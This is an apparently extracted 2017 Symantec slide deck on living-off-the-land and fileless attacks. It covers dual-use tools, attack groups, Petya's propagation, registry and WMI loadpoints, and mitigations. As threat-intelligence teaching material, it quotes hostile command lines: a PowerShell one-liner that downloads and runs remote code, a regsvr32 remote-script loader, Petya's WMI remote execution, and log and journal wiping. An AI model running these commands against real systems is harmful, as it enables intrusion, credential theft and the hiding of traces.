Living off the land and fileless attack techniques

Presenter Date

Living off the landtactics, fileless attacks & dual-use tools

2Copyright © 2017 Symantec Corporation

Definition: Living off the land

Only pre-installed software is used by the attacker and no additional binary executables are installed onto the system

Living off the land

2


Attackers are using what’s already available to attack youo Less new files on disk → more difficult to detect attack

o Use off-the-shelf tools & cloud services → difficult to determine intent & source

o These tools are ubiquitous → hide in plain sight

o Finding exploitable zero-day vulnerabilities is getting more difficult

→ use simple and proven methods such as email & social engineering

Living off the land

3


Multiple fileless methods possible - not all are truly fileless:

«Fileless» attacks

e.g. remote code exploits such as EternalBlue and CodeRedMEMORY ONLY ATTACKS

FILELESS LOADPOINT

NON-PE FILES

DUAL-USE TOOLS

Documents with macros, PDFs with JavaScript

and scripts (VBS, JavaScript, PowerShell,…)

Hiding scripts in the registry, WMI or GPO, e.g. Poweliks and Kotver

Using benign tools, such as PsExec, to do malicious things


Living off the land attack chain

Exploit in memorye.g. SMB EternalBlue

Email with Non-PE filee.g. document macro

Weak or stolen credentialse.g. RDP password guess

INCURSION

Remote script dropper e.g. LNK with PowerShell from cloud

1.

Memory only malwaree.g. SQL Slammer

Non-persistent

Persistent

PERSISTENCE

Fileless persistence loadpointe.g. JScript in registry

Regular non-fileless method

2.

PAYLOAD

Regular non-fileless payload

Non-PE file payloade.g. PowerShell script

Memory only payloade.g. Mirai DDoS

Dual-use toolse.g. netsh or PsExec.exe

3.


Section

Memory only attacks

1


Run malicious code only in memory, does not write any files to disk

o Mainly remote code execution (RCE) exploits, like EternalBlue

o CodeRed in 2001 was the first widespread outbreak of this type

o A computer restart will clean/disinfect

o PowerShell can be used to load and execute payload in memory

Attackers do not always need persistence:

o Mirai bot – re-infects device through a restart if it gets cleaned

o Targeted attack groups – core systems do not get restarted often

Memory only attacks


Section

Dual-use tools

2


System tools and clean applications used for nefarious purposes Some tools are pre-installed, some are downloaded by the attacker

Dual-use tools

Type of internal activity Purpose Dual-use tools

Internal network

reconnaissance

Enumerate information about a target

environment

net user, systeminfo, whoami,

hostname, quser, ipconfig

Credential harvesting

Obtain legitimate user credentials to gain

access to target systems for malicious

purposes

Mimikatz, WCE, pwdump

Lateral movement Gain deeper access into target network PsExec, PowerShell, WMI, RDP

Data exfiltration Send data back to attackersFTP, RAR, ZIP, iExplorer, PuTTY,

PowerShell, rdpclip

Fallback backdoorEnables a backdoor that can be used,

should the main backdoor be removednet user, RDP, Telnet server


o Many attack groups use common system tools during their attacks

Information gathering

• systeminfo

• net view

• net view /domain

• tasklist /v

• gpresult /z

• arp -a

• net share

• net use

• net user administrator

• net user /domain

• net user administrator /domain

• tasklist /fi

WATERBUG/TURLA

• hostname

• whoami

• ver

• ipconfig -all

• ping www.google.com

• query user

• net user

• net view

• net view /domain

• tasklist /svc

• netstat -ano | find \TCP\

• msdtc [IP] [port]

APPLEWORM/LAZARUS

• net user

• ipconfig /all

• net start

• systeminfo

• gpresult

BILLBUG


Group name Reconnaissance Credential harvesting Lateral movementCustom

built tools

Tick whoami, procdump, VBS WCE, Mimikatz, gsecdump PsExec Yes

Waterbug systeminfo, net, tasklist, gpresult,… WCE, pwdump Open shares Yes

Suckfly tcpscan, smbscan WCE, gsecdump, credentialdumper - Yes

Fritillary PowerShell, sdelete Mimikatz, PowerShell PsExec Yes

Destroyer Disk usage, event log viewer kerberos manipulator PsExec, curl, VNC Yes

Chafer network scanner, SMB bruteforcer WCE, Mimikatz, gsecdump,… PsExec Yes

Greenbug Broutlook WCE, gsecdump, browdump, … TeamViewer, PuTTY Yes

Buckeye os info, user info, smb enumerator,… pwdump, Lazagne, chromedump,… Open shares Yes

Billbugver, net, gpresult, systeminfo,

ipconfig, …- custom backdoor Yes

Appleworm net, netsh, query, telnet, find, … dumping SAM RDP bruteforcer, rdclip Yes

Targeted attacks & dual-use tools


o 10 out of 10 of groups analyzed used system tools in combination with custom tools during their attacks

o Application whitelisting often does not protect against such attacks

Examples:

o Petya used PsExec, WMI, and LSAdump for lateral movement

o Calcium/Fin7 group used PowerShell payloads in attacks in 2017

o Attack against DNC in 2016 used PowerShell for lateral movement and discovery and used a WMI fileless persistence method

Targeted attack groups


o Mimikatz and PsExec are popular for lateral movement, e.g. Petya

Dual-use tools

Global

usage


Example: Ransom.Petya


o Threat is a DLL executed by rundll32.exe

o Uses recompiled version of LSADump Mimikatz to get passwords

o Uses PsExec to propagate

o \\[server_name]\admin$\perfc.dat

o psexec rundll32.exe c:\windows\perfc.dat #1 <rand>

o Uses WMI to propagate if PsExec fails

o wmic.exe /node:[IP Address] /user:[USERNAME] /password:[PASSWORD] process call create “%System%\rundll32.exe \“%Windows%\perfc.dat\" #1 60”

o Scheduled task to restart into the malicious MBR payload

o schtasks /RU "SYSTEM" /Create /SC once /TN "" /TR “%system%\shutdown14:42.exe /r /f" /ST

o Deletes log files to hide traceso wevtutil cl Setup & wevtutil cl System & … & fsutil usn deletejournal /D %C:

Petya uses dual-use tools


The Odinaff group used multiple dual-use tools in their attack

o Mimikatz: An open source password recovery tool

o PsExec: A process execution tool from Microsoft

o Netscan: A network scanning tool

o Ammyy Admin: A remote access tool

o Gussdoor: A custom remote backdoor (Backdoor.Gussdoor)

o RunAs: A tool for running processes as another user

o PowerShell: Various commands used

Example: Odinaff group


o On average 2% of malware in our sandbox misused WMI

WMI usage in malware


Usage of dual-use tools - January 2017

Tool Usage count

sc.exe 2.7190%

vnc 2.1176%

net.exe 1.2733%

powershell.exe 1.0263%

ipconfig.exe 0.8227%

netsh.exe 0.7526%

teamviewer.exe 0.6224%

tasklist.exe 0.4963%

rdpclip.exe 0.3226%

rar.exe 0.3139%

Tool Usage count

wmic.exe 0.3027%

find.exe 0.2767%

curl.exe 0.2027%

netstat.exe 0.1938%

systeminfo.exe 0.1641%

wget.exe 0.1208%

nc.exe 0.1174%

gpresult.exe 0.1147%

whoami.exe 0.1109%

ammyy.exe 0.1061%

o System tools are popular with administrators and cyber criminals

o Remote administration tools are often misused by attackers


o PowerShell is still gaining popularity with attackers

Usage of dual-use tools


Section

Non-PE filesPE = Portable Executables

3


Malicious macro with social engineering

Malcious documents still popular

21

Embedded binary can be double clicked


o Scripts are very popular, especially PowerShell

o Many script toolkits available

o Scripts are easy to obfuscate and difficult to detect with signatures

o Scripts are flexible and can be quickly adapted if needed

Non-PE files

powershell.exe -nop -ep Bypass -noexit -c

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true};

iex ((New-Object System.Net.WebClient).DownloadString(‘[REMOVED]’))

Example PowerShell downloader


Common malware use cases for PowerShell

23

PowerShell script used to download payload to disk or memory

Often used in email attachments such as WSF or document macros

DOWNLOADER

PowerShell script used as persistent loadpoint on Windows

Often stored completely in registry (fileless) e.g. Kotver or within WMI

LOADPOINT

PowerShell script remoting to execute on remote computer (Invoke-Command)

Download and execute Mimikatz, etc. in order to steal credentials

LATERAL MOVEMENT


Email script downloaders

24

Detections by month for JavaScript and macro downloaders


o Malicious attachments with HTML code gained popularity in 2017

Attachment file extensions


Prevalence of PowerShello 95.4% of the PowerShell scripts submitted to Blue Coat MAA were malicious

26

Volume of PowerShell samples from customers in our sandbox in 2016

1. 9.4% W97M.Downloader

2. 4.5% Trojan.Kotver

3. 4.0% JS.Downloader

TOP 3 THREATS THAT USE POWERSHELL


Section

Fileless loadpoints

4


There are many ways to have a loadpoint without adding a new file:

o Windows registry

o Windows Management Instrumentation (WMI)

o Group Policies Objects (GPO)

o Scheduled task

o …

Fileless loadpoints


Common: Windows registry run key that points to the malware binary file

New trick: Windows registry run key contains a script that will get executed

o This script can load more payloads from other registry keys and run them

o As the script is not in a file on disk it might be missed by traditional security tools

Script embedded in the registry


o Multiple stages in registry

o Uses JavaScript and PowerShell

o Loads DLL directly into memory

o Decrypted directly in memory

o Uses non printable ASCII character to protect own registry key

Example: Poweliks


o Registry run key can also point to a remote SCT file

o Regsvr32 will download and execute the embedded JScript

Regsvr32 /s /n /u /i:%REMOTE_MALICIOUS_SCT_SCRIPT% scrobj.dll

Example: Downloder.Dromedan (40,000 detections / day)

o Embedded JScript uses WMI to execute a PowerShell payload

o Script stores encoded DLL in the registry for later

Remote SCT load

Malicious.sct file


Similar trigger methods exist for:

o Windows Management Instrumentation (WMI)

o Group Policies Objects (GPO)

o Scheduled task

Fileless loadpoints

WMI PowerShell backdoor


Without additional files, but writing to existing files

o File infector Infect any file that gets restarted with the PC

o Browser files Infect the core browser files or extensions

o PowerShell profile Add malicious script to profile file

o Trigger on shutdown Remove itself once started and write registry run key when system shutdown is called

o BITSadmin Add a malicious update server as backdoor

Not truly fileless loadpoints


If no file is written to disk → security measures might not work

Lack of indicators of compromise (IoCs) for sharing

Common malware does not always use a loadpoint anymore

Symantec has various detection features in place for such threats

Detection challenges


o Monitor the use of dual-use tools inside your network

o Block remote execution through PsExec and WMI (if applicable)

o Enable better logging and process the information (if applicable)

o Enable advanced account security features, like 2FA and login notification (if applicable)

o Protect against password and credential theft, for example, with behavior based security solutions

Mitigation & best practices


• Deepsight IoC feeds

• MATI custom reports

• Threat Intelligence

• Managed Security Services (MSS)

• Incident Response (IR) on site

• Data Loss Prevention (DLP)

• …

• Proxy SG secure web gateway

• Security Analytics

• Web Security Service

• Data Center Security (DCS)

• Control Compliance Suite (CCS)

…

Protection solutions

Symantec Endpoint Protection(SEP) 14

Reputation, machine learning, behavior detection, emulation, exploit mitigation, IPS, …

• Public awareness/white papers

• Law enforcement collaboration

• Infrastructure takedowns

• …

• Email Security.cloud

• MAA Sandbox

• Advanced Threat Protection(ATP)

• …

Attacker

Organization

Users


Advanced Antivirus Engine o Symantec uses an array of detection engines including an advanced

signature-based antivirus engine with heuristics, just-in-time (JIT) memory-

scanning, emulator and advanced machine-learning engines. This allows

for the detection of directly in-memory executed fileless threats.

SONAR Behavior Engineo SONAR is Symantec’s real-time behavior-based protection that blocks

potentially malicious applications from running on the computer. It detects

malware without requiring any specific detection signatures. SONAR uses

heuristics, reputation data, and behavioral policies to detect emerging and

unknown threats.

Email Protectiono Email-filtering services such as Symantec Email Security.cloud can block

malicious emails before they reach users. Symantec Messaging Gateway’s

Disarm Technology can also protect by removing malicious content before

they even reach the user.

Malware Analysis Sandboxo Sandboxes such as Blue Coat Malware Analysis have the capability to

analyze and block malicious scripts including PowerShell scripts.

The technology can overcome multiple layers of obfuscation to detect

deeply hidden suspicious behavior.

Network Protection

o Symantec’s Secure Web Gateway and IPS and firewall on the endpoint can

monitor and block malicious traffic entering or leaving a system and can

help minimizing impacts of attacks. Suspicious content can be

automatically analyzed on sandboxes.

System Hardeningo Symantec’s system hardening solution, Symantec Data Center Security,

can secure physical and virtual servers, and monitor the compliance

posture of server systems for on-premise, public, and private cloud data

centers. By defining allowed behavior, Symantec Data Center Security can

limit the use of scripts and any of their actions.

Visibility and Serviceso Symantec’s Managed Security Services can help with threat intelligtence,

with proactive threat hunting, as well as incident response handling.

Symantec: Robust protection against fileless threats

37


o Nearly all targeted attack groups use system tools in their attacks

o Sandboxes are often not able to handle fileless attacks properly

o Fileless attacks are difficult to detect as they leave less traces

o Application whitelisting will not protect against all living off the land tactics

o Script attacks, especially PowerShell, are increasing

Conclusion


o BLOG: Attackers are increasingly living off the land

o WHITEPAPER: Living off the land and fileless attack techniques

Further reading

https://www.symantec.com/connect/blogs/attackers-are-increasingly-living-land

https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/istr-living-off-the-land-and-fileless-attack-techniques-en.pdf

40Copyright © 2017 Symantec Corporation 40Copyright © 2017 Symantec Corporation

Thank you